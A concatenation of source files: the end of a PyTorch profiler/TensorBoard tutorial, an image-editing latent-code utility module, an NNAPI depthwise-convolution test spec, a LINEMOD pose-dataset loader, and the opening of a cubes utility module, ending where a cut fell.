# - ``schedule`` - callable that takes step (int) as a single parameter
# and returns the profiler action to perform at each step.
#
# In this example with ``wait=1, warmup=1, active=3, repeat=2``,
# profiler will skip the first step/iteration,
# start warming up on the second,
# record the following three iterations,
# after which the trace will become available and on_trace_ready (when set) is called.
# In total, the cycle repeats twice. Each cycle is called a "span" in TensorBoard plugin.
#
# During ``wait`` steps, the profiler is disabled.
# During ``warmup`` steps, the profiler starts tracing but the results are discarded.
# This is for reducing the profiling overhead.
#    The overhead at the beginning of profiling is high and would otherwise skew the profiling results.
# During ``active`` steps, the profiler works and records events.
# - ``on_trace_ready`` - callable that is called at the end of each cycle;
# In this example we use ``torch.profiler.tensorboard_trace_handler`` to generate result files for TensorBoard.
# After profiling, result files will be saved into the ``./log/resnet18`` directory.
# Specify this directory as a ``logdir`` parameter to analyze profile in TensorBoard.
# - ``record_shapes`` - whether to record shapes of the operator inputs.
# - ``profile_memory`` - Track tensor memory allocation/deallocation.
# - ``with_stack`` - Record source information (file and line number) for the ops.
# If the TensorBoard is launched in VSCode (`reference <https://code.visualstudio.com/docs/datascience/pytorch-support#_tensorboard-integration>`_),
# clicking a stack frame will navigate to the specific code line.
# Profile the training loop: skip 1 step, warm up for 1, record 3, and repeat
# that cycle twice, writing TensorBoard traces to ./log/resnet18.
with torch.profiler.profile(
        schedule=torch.profiler.schedule(wait=1, warmup=1, active=3, repeat=2),
        on_trace_ready=torch.profiler.tensorboard_trace_handler('./log/resnet18'),
        record_shapes=True,
        with_stack=True
) as prof:
    for step, batch_data in enumerate(train_loader):
        # (wait + warmup + active) * repeat — stop once both spans are recorded.
        if step >= (1 + 1 + 3) * 2:
            break
        train(batch_data)
        prof.step()  # Need to call this at the end of each step to notify profiler of steps' boundary.
######################################################################
# 3. Run the profiler
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Run the above code. The profiling result will be saved under ``./log/resnet18`` directory.
######################################################################
# 4. Use TensorBoard to view results and analyze model performance
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Install PyTorch Profiler TensorBoard Plugin.
#
# ::
#
# pip install torch_tb_profiler
#
######################################################################
# Launch the TensorBoard.
#
# ::
#
# tensorboard --logdir=./log
#
######################################################################
# Open the TensorBoard profile URL in Google Chrome browser or Microsoft Edge browser.
#
# ::
#
# http://localhost:6006/#pytorch_profiler
#
######################################################################
# You could see Profiler plugin page as shown below.
#
# - Overview
# .. image:: ../../_static/img/profiler_overview1.png
# :scale: 25 %
#
# The overview shows a high-level summary of model performance.
#
# The "GPU Summary" panel shows the GPU configuration and the GPU usage.
# In this example, the GPU Utilization is low.
# The details of these metrics are `here <https://github.com/guyang3532/kineto/blob/readme/tb_plugin/docs/gpu_utilization.md>`_.
#
# The "Step Time Breakdown" shows distribution of time spent in each step over different categories of execution.
# In this example, you can see the ``DataLoader`` overhead is significant.
#
# The bottom "Performance Recommendation" uses the profiling data
# to automatically highlight likely bottlenecks,
# and gives you actionable optimization suggestions.
#
# You can change the view page in left "Views" dropdown list.
#
# .. image:: ../../_static/img/profiler_views_list.png
# :alt:
#
#
# - Operator view
# The operator view displays the performance of every PyTorch operator
# that is executed either on the host or device.
#
# .. image:: ../../_static/img/profiler_operator_view.png
# :scale: 25 %
# The "Self" duration does not include its child operators’ time.
# The "Total" duration includes its child operators’ time.
#
# - View call stack
# Click the "View Callstack" of an operator, the operators with same name but different call stacks will be shown.
# Then click a "View Callstack" in this sub-table, the call stack frames will be shown.
#
# .. image:: ../../_static/img/profiler_callstack.png
# :scale: 25 %
#
# If the TensorBoard is launched inside VSCode
# (`Launch Guide <https://devblogs.microsoft.com/python/python-in-visual-studio-code-february-2021-release/#tensorboard-integration>`_),
# clicking a call stack frame will navigate to the specific code line.
#
# .. image:: ../../_static/img/profiler_vscode.png
# :scale: 25 %
#
#
# - Kernel view
# The GPU kernel view shows all kernels’ time spent on GPU.
#
# .. image:: ../../_static/img/profiler_kernel_view.png
# :scale: 25 %
# Mean Blocks per SM:
# Blocks per SM = Blocks of this kernel / SM number of this GPU.
# If this number is less than 1, it indicates the GPU multiprocessors are not fully utilized.
# "Mean Blocks per SM" is weighted average of all runs of this kernel name, using each run’s duration as weight.
#
# Mean Est. Achieved Occupancy:
# Est. Achieved Occupancy is defined in this column’s tooltip.
# For most cases such as memory bandwidth bounded kernels, the higher the better.
# "Mean Est. Achieved Occupancy" is weighted average of all runs of this kernel name,
# using each run’s duration as weight.
#
# - Trace view
# The trace view shows timeline of profiled operators and GPU kernels.
# You can select it to see details as below.
#
# .. image:: ../../_static/img/profiler_trace_view1.png
# :scale: 25 %
#
# You can move the graph and zoom in/out with the help of right side toolbar.
# And keyboard can also be used to zoom and move around inside the timeline.
# The ‘w’ and ‘s’ keys zoom in centered around the mouse,
# and the ‘a’ and ‘d’ keys move the timeline left and right.
# You can hit these keys multiple times until you see a readable representation.
#
# In this example, we can see the event prefixed with ``enumerate(DataLoader)`` costs a lot of time.
# And during most of this period, the GPU is idle.
# Because this function is loading data and transforming data on host side,
# during which the GPU resource is wasted.
######################################################################
# 5. Improve performance with the help of profiler
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# At the bottom of "Overview" page, the suggestion in "Performance Recommendation" hints the bottleneck is DataLoader.
# The PyTorch DataLoader uses single process by default.
# User could enable multi-process data loading by setting the parameter ``num_workers``.
# `Here <https://pytorch.org/docs/stable/data.html#single-and-multi-process-data-loading>`_ is more details.
#
# In this example, we follow the "Performance Recommendation" and set ``num_workers`` as below,
# pass a different name such as ``./log/resnet18_4workers`` to ``tensorboard_trace_handler``, and run it again.
#
# ::
#
# train_loader = torch.utils.data.DataLoader(train_set, batch_size=32, shuffle=True, num_workers=4)
#
######################################################################
# Then let’s choose the recently profiled run in left "Runs" dropdown list.
#
# .. image:: ../../_static/img/profiler_overview2.png
# :scale: 25 %
#
# From the above view, we can find the step time is reduced to about 58ms comparing with previous run's 121ms,
# and the time reduction of ``DataLoader`` mainly contributes.
#
# .. image:: ../../_static/img/profiler_trace_view2.png
# :scale: 25 %
#
# From the above view, we can see that the runtime of ``enumerate(DataLoader)`` is reduced,
# and the GPU utilization is increased.
######################################################################
# 6. Analyze performance with other advanced features
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# - Memory view
# To profile memory, please add ``profile_memory=True`` in arguments of ``torch.profiler.profile``.
#
# Note: Because of the current non-optimized implementation of PyTorch profiler,
# enabling ``profile_memory=True`` will take about several minutes to finish.
# To save time, you can try our existing examples first by running:
#
# ::
#
# tensorboard --logdir=https://torchtbprofiler.blob.core.windows.net/torchtbprofiler/demo/memory_demo
#
# The profiler records all memory allocation/release events during profiling.
# For every specific operator, the plugin aggregates all these memory events inside its life span.
#
# .. image:: ../../_static/img/profiler_memory_view.png
# :scale: 25 %
#
# The memory type could be selected in "Device" selection box.
# For example, "GPU0" means the following table only shows each operator’s memory usage on GPU 0, not including CPU or other GPUs.
#
# The "Size Increase" sums up all allocation bytes and minus all the memory release bytes.
#
# The "Allocation Size" sums up all allocation bytes without considering the memory release.
#
# - Distributed view
# The plugin now supports distributed view on profiling DDP with NCCL as backend.
#
# You can try it by using existing example on Azure:
#
# ::
#
# tensorboard --logdir=https://torchtbprofiler.blob.core.windows.net/torchtbprofiler/demo/distributed_bert
#
# .. image:: ../../_static/img/profiler_distributed_view.png
# :scale: 25 %
#
# The "Computation/Communication Overview" shows computation/communication ratio and their overlapping degree.
# From this view, User can figure out load balance issue among workers.
# For example, if the computation + overlapping time of one worker is much larger than others,
# there may be a problem of load balance or this worker may be a straggler.
#
# The "Synchronizing/Communication Overview" shows the efficiency of communication.
# "Data Transfer Time" is the time for actual data exchanging.
# "Synchronizing Time" is the time for waiting and synchronizing with other workers.
#
# If one worker’s "Synchronizing Time" is much shorter than that of other workers’,
# this worker may be a straggler which may have more computation workload than other workers’.
#
# The "Communication Operations Stats" summarizes the detailed statistics of all communication ops in each worker.
######################################################################
# Learn More
# ----------
#
# Take a look at the following documents to continue your learning,
# and feel free to open an issue `here <https://github.com/pytorch/kineto/issues>`_.
#
# - `Pytorch TensorBoard Profiler github <https://github.com/pytorch/kineto/tree/master/tb_plugin>`_
# - `torch.profiler API <https://pytorch.org/docs/master/profiler.html>`_
|
utils/editor.py | tien1504/idinvert_pytorch | 415 | 10572 | <reponame>tien1504/idinvert_pytorch
# python 3.7
"""Utility functions for image editing from latent space."""
import os.path
import numpy as np
__all__ = [
'parse_indices', 'interpolate', 'mix_style',
'get_layerwise_manipulation_strength', 'manipulate', 'parse_boundary_list'
]
def parse_indices(obj, min_val=None, max_val=None):
  """Parses indices.

  If the input is a list or tuple, this function has no effect.

  The input can also be a string, which is either a comma separated list of
  numbers 'a, b, c', or a dash separated range 'a - c'. Space in the string will
  be ignored.

  Args:
    obj: The input object to parse indices from.
    min_val: If not `None`, this function will check that all indices are equal
      to or larger than this value. (default: None)
    max_val: If not `None`, this function will check that all indices are equal
      to or smaller than this field. (default: None)

  Returns:
    A list of integers.

  Raises:
    ValueError: If the input is invalid, i.e., neither a list or tuple, nor a
      string, or if a string segment is neither a single number nor a
      dash-separated range.
  """
  if obj is None or obj == '':
    indices = []
  elif isinstance(obj, int):
    indices = [obj]
  elif isinstance(obj, (list, tuple, np.ndarray)):
    indices = list(obj)
  elif isinstance(obj, str):
    indices = []
    splits = obj.replace(' ', '').split(',')
    for split in splits:
      numbers = list(map(int, split.split('-')))
      if len(numbers) == 1:
        indices.append(numbers[0])
      elif len(numbers) == 2:
        indices.extend(list(range(numbers[0], numbers[1] + 1)))
      else:
        # BUG FIX: segments such as '1-2-3' were previously dropped silently.
        raise ValueError(f'Invalid index segment `{split}`: a segment should '
                         f'be a single number or a range `a-b`!')
  else:
    raise ValueError(f'Invalid type of input: {type(obj)}!')

  assert isinstance(indices, list)
  indices = sorted(list(set(indices)))
  for idx in indices:
    assert isinstance(idx, int)
    if min_val is not None:
      assert idx >= min_val, f'{idx} is smaller than min val `{min_val}`!'
    if max_val is not None:
      assert idx <= max_val, f'{idx} is larger than max val `{max_val}`!'

  return indices
def interpolate(src_codes, dst_codes, step=5):
  """Linearly interpolates two sets of latent codes.

  Args:
    src_codes: Source codes, with shape [num, *code_shape].
    dst_codes: Target codes, with shape [num, *code_shape].
    step: Number of interpolation steps, with source and target included.
      For example, `step = 5` inserts three intermediate samples. (default: 5)

  Returns:
    Interpolated codes, with shape [num, step, *code_shape].

  Raises:
    ValueError: If the two input sets have mismatching shapes, or fewer than
      two dimensions.
  """
  if src_codes.ndim < 2 or src_codes.shape != dst_codes.shape:
    raise ValueError(f'Shapes of source codes and target codes should both be '
                     f'[num, *code_shape], but {src_codes.shape} and '
                     f'{dst_codes.shape} are received!')

  num, code_shape = src_codes.shape[0], src_codes.shape[1:]
  start = src_codes[:, np.newaxis]
  delta = dst_codes[:, np.newaxis] - start
  # Broadcast the interpolation weights along the step axis only.
  weight_shape = [step if axis == 1 else 1 for axis in range(start.ndim)]
  weights = np.linspace(0.0, 1.0, step).reshape(weight_shape)
  results = start + weights * delta
  assert results.shape == (num, step, *code_shape)
  return results
def mix_style(style_codes,
              content_codes,
              num_layers=1,
              mix_layers=None,
              is_style_layerwise=True,
              is_content_layerwise=True):
  """Mixes styles from style codes to those of content codes.

  Each style code or content code consists of `num_layers` codes, each of which
  is typically fed into a particular layer of the generator. This function mixes
  styles by partially replacing the codes of `content_codes` from some certain
  layers with those of `style_codes`.

  For example, if both style code and content code are with shape [10, 512],
  meaning to have 10 layers and each employs a 512-dimensional latent code. And
  the 1st, 2nd, and 3rd layers are the target layers to perform style mixing.
  Then the top half of the content code (with shape [3, 512]) will be replaced
  by the top half of the style code (also with shape [3, 512]).

  NOTE: This function also supports taking single-layer latent codes as inputs,
  i.e., setting `is_style_layerwise` or `is_content_layerwise` as False. In this
  case, the corresponding code will be first repeated for `num_layers` before
  performing style mixing.

  Args:
    style_codes: Style codes, with shape [num_styles, *code_shape] or
      [num_styles, num_layers, *code_shape].
    content_codes: Content codes, with shape [num_contents, *code_shape] or
      [num_contents, num_layers, *code_shape].
    num_layers: Total number of layers in the generative model. (default: 1)
    mix_layers: Indices of the layers to perform style mixing. `None` means to
      replace all layers, in which case the content code will be completely
      replaced by style code. (default: None)
    is_style_layerwise: Indicating whether the input `style_codes` are
      layer-wise codes. (default: True)
    is_content_layerwise: Indicating whether the input `content_codes` are
      layer-wise codes. (default: True)

  Returns:
    Codes after style mixing, with shape [num_styles, num_contents, num_layers,
      *code_shape].

  Raises:
    ValueError: If input `content_codes` or `style_codes` is with invalid shape.
  """
  # Repeat single-layer codes along a new layer axis so that both inputs end
  # up with shape [num, num_layers, *code_shape].
  if not is_style_layerwise:
    style_codes = style_codes[:, np.newaxis]
    style_codes = np.tile(
        style_codes,
        [num_layers if axis == 1 else 1 for axis in range(style_codes.ndim)])
  if not is_content_layerwise:
    content_codes = content_codes[:, np.newaxis]
    content_codes = np.tile(
        content_codes,
        [num_layers if axis == 1 else 1 for axis in range(content_codes.ndim)])

  if not (style_codes.ndim >= 3 and style_codes.shape[1] == num_layers and
          style_codes.shape[1:] == content_codes.shape[1:]):
    raise ValueError(f'Shapes of style codes and content codes should be '
                     f'[num_styles, num_layers, *code_shape] and '
                     f'[num_contents, num_layers, *code_shape] respectively, '
                     f'but {style_codes.shape} and {content_codes.shape} are '
                     f'received!')

  layer_indices = parse_indices(mix_layers, min_val=0, max_val=num_layers - 1)
  if not layer_indices:
    layer_indices = list(range(num_layers))

  num_styles = style_codes.shape[0]
  num_contents = content_codes.shape[0]
  code_shape = content_codes.shape[2:]

  # Broadcast both inputs to a common [num_styles, num_contents, ...] grid.
  s = style_codes[:, np.newaxis]
  s = np.tile(s, [num_contents if axis == 1 else 1 for axis in range(s.ndim)])
  c = content_codes[np.newaxis]
  c = np.tile(c, [num_styles if axis == 0 else 1 for axis in range(c.ndim)])

  # Boolean mask selecting, per layer, whether the style code replaces the
  # content code.
  from_style = np.zeros(s.shape, dtype=bool)
  from_style[:, :, layer_indices] = True
  results = np.where(from_style, s, c)
  assert results.shape == (num_styles, num_contents, num_layers, *code_shape)

  return results
def get_layerwise_manipulation_strength(num_layers,
                                        truncation_psi,
                                        truncation_layers):
  """Gets layer-wise strength for manipulation.

  Recall the truncation trick played on layer [0, truncation_layers):

  w = truncation_psi * w + (1 - truncation_psi) * w_avg

  So, when using the same boundary to manipulate different layers, layer
  [0, truncation_layers) and layer [truncation_layers, num_layers) should use
  different strength to eliminate the effect from the truncation trick. More
  concretely, the strength for layer [0, truncation_layers) is set as
  `truncation_psi`, while that for other layers are set as 1.

  NOTE: A `truncation_layers` larger than `num_layers` is clamped to
  `num_layers` (previously this raised IndexError).
  """
  # Clamp so a truncation range exceeding the model depth cannot overflow the
  # strength list.
  truncation_layers = min(truncation_layers, num_layers)
  strength = [1.0 for _ in range(num_layers)]
  if truncation_layers > 0:
    for layer_idx in range(0, truncation_layers):
      strength[layer_idx] = truncation_psi
  return strength
def manipulate(latent_codes,
               boundary,
               start_distance=-5.0,
               end_distance=5.0,
               step=21,
               layerwise_manipulation=False,
               num_layers=1,
               manipulate_layers=None,
               is_code_layerwise=False,
               is_boundary_layerwise=False,
               layerwise_manipulation_strength=1.0):
  """Manipulates the given latent codes with respect to a particular boundary.

  Basically, this function takes a set of latent codes and a boundary as inputs,
  and outputs a collection of manipulated latent codes.

  For example, let `step` to be 10, `latent_codes` to be with shape [num,
  *code_shape], and `boundary` to be with shape [1, *code_shape] and unit norm.
  Then the output will be with shape [num, 10, *code_shape]. For each 10-element
  manipulated codes, the first code is `start_distance` away from the original
  code (i.e., the input) along the `boundary` direction, while the last code is
  `end_distance` away. Remaining codes are linearly interpolated. Here,
  `distance` is sign sensitive.

  NOTE: This function also supports layer-wise manipulation, in which case the
  generator should be able to take layer-wise latent codes as inputs. For
  example, if the generator has 18 convolutional layers in total, and each of
  which takes an independent latent code as input. It is possible, sometimes
  with even better performance, to only partially manipulate these latent codes
  corresponding to some certain layers yet keeping others untouched.

  NOTE: Boundary is assumed to be normalized to unit norm already.

  Args:
    latent_codes: The input latent codes for manipulation, with shape
      [num, *code_shape] or [num, num_layers, *code_shape].
    boundary: The semantic boundary as reference, with shape [1, *code_shape] or
      [1, num_layers, *code_shape].
    start_distance: Start point for manipulation. (default: -5.0)
    end_distance: End point for manipulation. (default: 5.0)
    step: Number of manipulation steps. (default: 21)
    layerwise_manipulation: Whether to perform layer-wise manipulation.
      (default: False)
    num_layers: Number of layers. Only active when `layerwise_manipulation` is
      set as `True`. Should be a positive integer. (default: 1)
    manipulate_layers: Indices of the layers to perform manipulation. `None`
      means to manipulate latent codes from all layers. (default: None)
    is_code_layerwise: Whether the input latent codes are layer-wise. If set as
      `False`, the function will first repeat the input codes for `num_layers`
      times before perform manipulation. (default: False)
    is_boundary_layerwise: Whether the input boundary is layer-wise. If set as
      `False`, the function will first repeat boundary for `num_layers` times
      before perform manipulation. (default: False)
    layerwise_manipulation_strength: Manipulation strength for each layer. Only
      active when `layerwise_manipulation` is set as `True`. This field can be
      used to resolve the strength discrepancy across layers when truncation
      trick is on. See function `get_layerwise_manipulation_strength()` for
      details. A tuple, list, or `numpy.ndarray` is expected. If set as a single
      number, this strength will be used for all layers. (default: 1.0)

  Returns:
    Manipulated codes, with shape [num, step, *code_shape] if
      `layerwise_manipulation` is set as `False`, or shape [num, step,
      num_layers, *code_shape] if `layerwise_manipulation` is set as `True`.

  Raises:
    ValueError: If the input latent codes, boundary, or strength are with
      invalid shape.
  """
  if not (boundary.ndim >= 2 and boundary.shape[0] == 1):
    raise ValueError(f'Boundary should be with shape [1, *code_shape] or '
                     f'[1, num_layers, *code_shape], but '
                     f'{boundary.shape} is received!')

  # Non-layer-wise manipulation reduces to the single-layer case.
  if not layerwise_manipulation:
    assert not is_code_layerwise
    assert not is_boundary_layerwise
    num_layers = 1
    manipulate_layers = None
    layerwise_manipulation_strength = 1.0

  # Preprocessing for layer-wise manipulation.
  # Parse indices of manipulation layers.
  layer_indices = parse_indices(
      manipulate_layers, min_val=0, max_val=num_layers - 1)
  if not layer_indices:
    layer_indices = list(range(num_layers))
  # Make latent codes layer-wise if needed.
  assert num_layers > 0
  if not is_code_layerwise:
    x = latent_codes[:, np.newaxis]
    x = np.tile(x, [num_layers if axis == 1 else 1 for axis in range(x.ndim)])
  else:
    x = latent_codes
    if x.shape[1] != num_layers:
      raise ValueError(f'Latent codes should be with shape [num, num_layers, '
                       f'*code_shape], where `num_layers` equals to '
                       f'{num_layers}, but {x.shape} is received!')
  # Make boundary layer-wise if needed.
  if not is_boundary_layerwise:
    b = boundary
    b = np.tile(b, [num_layers if axis == 0 else 1 for axis in range(b.ndim)])
  else:
    b = boundary[0]
    if b.shape[0] != num_layers:
      raise ValueError(f'Boundary should be with shape [num_layers, '
                       f'*code_shape], where `num_layers` equals to '
                       f'{num_layers}, but {b.shape} is received!')
  # Get layer-wise manipulation strength.
  if isinstance(layerwise_manipulation_strength, (int, float)):
    s = [float(layerwise_manipulation_strength) for _ in range(num_layers)]
  elif isinstance(layerwise_manipulation_strength, (list, tuple)):
    s = layerwise_manipulation_strength
    if len(s) != num_layers:
      raise ValueError(f'Shape of layer-wise manipulation strength `{len(s)}` '
                       f'mismatches number of layers `{num_layers}`!')
  elif isinstance(layerwise_manipulation_strength, np.ndarray):
    s = layerwise_manipulation_strength
    if s.size != num_layers:
      raise ValueError(f'Shape of layer-wise manipulation strength `{s.size}` '
                       f'mismatches number of layers `{num_layers}`!')
  else:
    raise ValueError(f'Unsupported type of `layerwise_manipulation_strength`!')
  # Fold the per-layer strength into the boundary itself.
  s = np.array(s).reshape(
      [num_layers if axis == 0 else 1 for axis in range(b.ndim)])
  b = b * s

  if x.shape[1:] != b.shape:
    raise ValueError(f'Latent code shape {x.shape} and boundary shape '
                     f'{b.shape} mismatch!')
  num = x.shape[0]
  code_shape = x.shape[2:]

  # Broadcast codes/boundary/distances to [num, step, num_layers, *code_shape]
  # and shift only the selected layers along the boundary direction.
  x = x[:, np.newaxis]
  b = b[np.newaxis, np.newaxis, :]
  l = np.linspace(start_distance, end_distance, step).reshape(
      [step if axis == 1 else 1 for axis in range(x.ndim)])
  results = np.tile(x, [step if axis == 1 else 1 for axis in range(x.ndim)])
  is_manipulatable = np.zeros(results.shape, dtype=bool)
  is_manipulatable[:, :, layer_indices] = True
  results = np.where(is_manipulatable, x + l * b, results)
  assert results.shape == (num, step, num_layers, *code_shape)

  return results if layerwise_manipulation else results[:, :, 0]
def parse_boundary_list(boundary_list_path):
  """Parses boundary list.

  Sometimes, a text file containing a list of boundaries will significantly
  simplify image manipulation with a large amount of boundaries. This function
  is used to parse boundary information from such list file.

  Basically, each item in the list should be with format
  `($NAME, $SPACE_TYPE): $PATH`. `DISABLE` at the beginning of the line can
  disable a particular boundary. Blank lines are ignored.

  Sample:

  (age, z): $AGE_BOUNDARY_PATH
  (gender, w): $GENDER_BOUNDARY_PATH
  DISABLE(pose, wp): $POSE_BOUNDARY_PATH

  Args:
    boundary_list_path: Path to the boundary list.

  Returns:
    A dictionary, whose key is a two-element tuple (boundary_name, space_type)
      and value is the corresponding boundary path.

  Raise:
    ValueError: If the given boundary list does not exist.
  """
  if not os.path.isfile(boundary_list_path):
    # BUG FIX: the path was previously not interpolated into the message.
    raise ValueError(f'Boundary list `{boundary_list_path}` does not exist!')

  boundaries = {}
  with open(boundary_list_path, 'r') as f:
    for line in f:
      line = line.strip()
      # Skip blank lines (previously crashed the unpack below) and disabled
      # entries.
      if not line or line.startswith('DISABLE'):
        continue
      # Split on the first colon only, so boundary paths may contain colons.
      boundary_info, boundary_path = line.split(':', 1)
      boundary_name, space_type = boundary_info.strip()[1:-1].split(',')
      boundary_name = boundary_name.strip()
      space_type = space_type.strip().lower()
      boundary_path = boundary_path.strip()
      boundaries[(boundary_name, space_type)] = boundary_path
  return boundaries
|
test/cts/tool/CTSConverter/src/nn/specs/V1_1/depthwise_conv2d_float_weights_as_inputs_relaxed.mod.py | zhaoming0/webml-polyfill | 255 | 10586 | #
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NNAPI CTS test-generator spec for DEPTHWISE_CONV_2D with the filter weights
# and bias supplied as model *inputs* (not constants), in relaxed-precision
# execution mode.
model = Model()
i1 = Input("op1", "TENSOR_FLOAT32", "{1, 3, 3, 2}")    # input feature map (NHWC)
f1 = Input("op2", "TENSOR_FLOAT32", "{1, 2, 2, 4}")    # depthwise filter
b1 = Input("op3", "TENSOR_FLOAT32", "{4}")             # per-channel bias
pad0 = Int32Scalar("pad0", 0)                          # explicit zero padding
act = Int32Scalar("act", 0)                            # activation: none
stride = Int32Scalar("stride", 1)
cm = Int32Scalar("channelMultiplier", 2)               # 2 input channels * 2 = 4 output channels
output = Output("op4", "TENSOR_FLOAT32", "{1, 2, 2, 4}")
model = model.Operation("DEPTHWISE_CONV_2D",
                        i1, f1, b1,
                        pad0, pad0, pad0, pad0,
                        stride, stride,
                        cm, act).To(output)
model = model.RelaxedExecution(True)
# Example 1. Input in operand 0,
input0 = {i1: # input 0
          [10, 21, 10, 22, 10, 23,
           10, 24, 10, 25, 10, 26,
           10, 27, 10, 28, 10, 29],
          f1:
          [.25, 0, .2, 0,
           .25, 0, 0, .3,
           .25, 0, 0, 0,
           .25, .1, 0, 0],
          b1:
          [1, 2, 3, 4]}
# (i1 (conv) f1) + b1
# filter usage:
#   in_ch1 * f_1 --> output_d1
#   in_ch1 * f_2 --> output_d2
#   in_ch2 * f_3 --> output_d3
#   in_ch3 * f_4 --> output_d4
output0 = {output: # output 0
           [11, 3, 7.2, 10.6,
            11, 3, 7.4, 10.9,
            11, 3, 7.8, 11.5,
            11, 3, 8.0, 11.8]}
# Instantiate an example
Example((input0, output0))
|
single-shot-pose/lib/linemod_dataset.py | take-cheeze/models | 112 | 10602 | <gh_stars>100-1000
import numpy as np
import os
from chainercv.chainer_experimental.datasets.sliceable import GetterDataset
from chainercv.utils import read_image
# Per-object model diameters for the LINEMOD dataset.
# NOTE(review): values appear to be in meters (typical for LINEMOD
# ADD-metric thresholds) — confirm against the dataset's model files.
linemod_object_diameters = {
    'ape': 0.103,
    'benchvise': 0.286908,
    'cam': 0.173,
    'can': 0.202,
    'cat': 0.155,
    'driller': 0.262,
    'duck': 0.109,
    'eggbox': 0.176364,
    'glue': 0.176,
    'holepuncher': 0.162,
    'iron': 0.303153,
    'lamp': 0.285155,
    'phone': 0.213}
class LinemodDataset(GetterDataset):
    """Sliceable dataset for one object of the LINEMOD 6D-pose dataset.

    Reads a split file listing image paths and exposes, per example:
    ``img`` (CHW float image), ``point`` (``(R, 9, 2)`` float32 array of
    pixel coordinates — 9 points per instance, scaled from normalized
    label coordinates), and ``label`` (``(R,)`` int32 class ids).
    If ``return_msk`` is True, a boolean foreground mask ``msk`` is also
    available.
    """

    def __init__(self, base_dir, obj_name='ape', split='train',
                 return_msk=False):
        super(LinemodDataset, self).__init__()
        split_path = os.path.join(
            base_dir, 'LINEMOD', obj_name, '{}.txt'.format(split))
        self.base_dir = base_dir
        with open(split_path, 'r') as f:
            self.img_paths = f.readlines()
        self.add_getter(('img', 'point', 'label'), self._get_example)
        if return_msk:
            self.add_getter('msk', self._get_msk)

    def __len__(self):
        return len(self.img_paths)

    def _get_example(self, i):
        """Load image i together with its keypoint annotation."""
        img_path = os.path.join(self.base_dir, self.img_paths[i].rstrip())
        img = read_image(img_path)
        # Label files live next to the images under a 'labels' directory.
        anno_path = img_path.replace(
            'images', 'labels').replace(
            'JPEGImages', 'labels').replace(
            '.jpg', '.txt').replace('.png', '.txt')
        # BUG FIX: H/W were previously bound only inside the branch below,
        # so an empty label file made the scaling code raise NameError.
        _, H, W = img.shape
        # Annotations are zero-padded to at most 50 rows of 21 values each.
        anno = np.zeros(50*21)
        if os.path.getsize(anno_path):
            tmp = read_truths_args(anno_path, 8.0/W)
            size = tmp.size
            if size > 50*21:
                anno = tmp[0:50*21]
            elif size > 0:
                anno[0:size] = tmp
        anno = anno.reshape(-1, 21)
        anno = anno[:truths_length(anno)]
        # Columns 1..18 hold 9 (x, y) pairs in normalized [0, 1] coordinates;
        # scale them to pixel coordinates.
        point = anno[:, 1:19].reshape(-1, 9, 2).astype(np.float32)
        point[:, :, 0] *= W
        point[:, :, 1] *= H
        label = anno[:, 0].astype(np.int32)
        return img, point, label

    def _get_msk(self, i):
        """Load the boolean foreground mask for image i."""
        img_path = os.path.join(self.base_dir, self.img_paths[i].rstrip())
        mskpath = img_path.replace('JPEGImages', 'mask').replace(
            '/00', '/').replace('.jpg', '.png')
        msk = read_image(mskpath, color=False)[0]
        return msk > 0
def truths_length(truths):
    """Return the number of valid annotation rows in *truths*.

    Rows are valid until the first row whose second column is 0, which marks
    the zero-padding appended by the loader. Previously this scanned a
    hard-coded 50 rows, raising IndexError for shorter arrays and implicitly
    returning None when every row was in use; it now handles any length and
    returns len(truths) when no padding row is found (callers slicing with
    ``truths[:truths_length(truths)]`` get the same result as with None).
    """
    for i, row in enumerate(truths):
        if row[1] == 0:
            return i
    return len(truths)
def read_truths(lab_path):
    """Load a label file as an (N, 21) float array.

    Returns an empty array when the file exists but has no content.
    """
    if not os.path.getsize(lab_path):
        return np.array([])
    values = np.loadtxt(lab_path)
    # Reshape also covers the single-annotation case, where loadtxt
    # returns a 1-D array instead of a 2-D one.
    return values.reshape(values.size // 21, 21)
def read_truths_args(lab_path, min_box_scale):
    """Return the first 19 columns of each ground-truth row in `lab_path`.

    NOTE(review): ``min_box_scale`` is accepted but never used here;
    upstream variants filtered out boxes smaller than this scale.
    Confirm before relying on any filtering behaviour.
    """
    truths = read_truths(lab_path)
    rows = []
    for row in truths:
        rows.append(list(row[:19]))
    return np.array(rows)
|
cubes/common.py | digitalsatori/cubes | 1,020 | 10616 | # -*- encoding: utf-8 -*-
"""Utility functions for computing combinations of dimensions and hierarchy
levels"""
from __future__ import absolute_import
import re
import os.path
import json
from collections import OrderedDict
from .errors import ModelInconsistencyError, ArgumentError, ConfigurationError
from . import compat
__all__ = [
"IgnoringDictionary",
"MissingPackage",
"localize_common",
"localize_attributes",
"get_localizable_attributes",
"decamelize",
"to_identifier",
"assert_instance",
"assert_all_instances",
"read_json_file",
"sorted_dependencies",
]
class IgnoringDictionary(OrderedDict):
    """Ordered dictionary that silently drops assignments of ``None``.

    Use :meth:`set` to store a ``None`` value explicitly.
    """

    def __setitem__(self, key, value):
        # Only non-None values make it into the mapping.
        if value is not None:
            super(IgnoringDictionary, self).__setitem__(key, value)

    def set(self, key, value):
        """Sets `value` for `key` even if value is null."""
        super(IgnoringDictionary, self).__setitem__(key, value)

    def __repr__(self):
        pairs = ", ".join(
            "%s: %s" % (repr(key), repr(value)) for key, value in self.items())
        return "{%s}" % pairs
def assert_instance(obj, class_, label):
    """Raise ModelInconsistencyError when `obj` is not an instance of `class_`."""
    if isinstance(obj, class_):
        return
    raise ModelInconsistencyError("%s should be sublcass of %s, "
                                  "provided: %s" % (label,
                                                    class_.__name__,
                                                    type(obj).__name__))
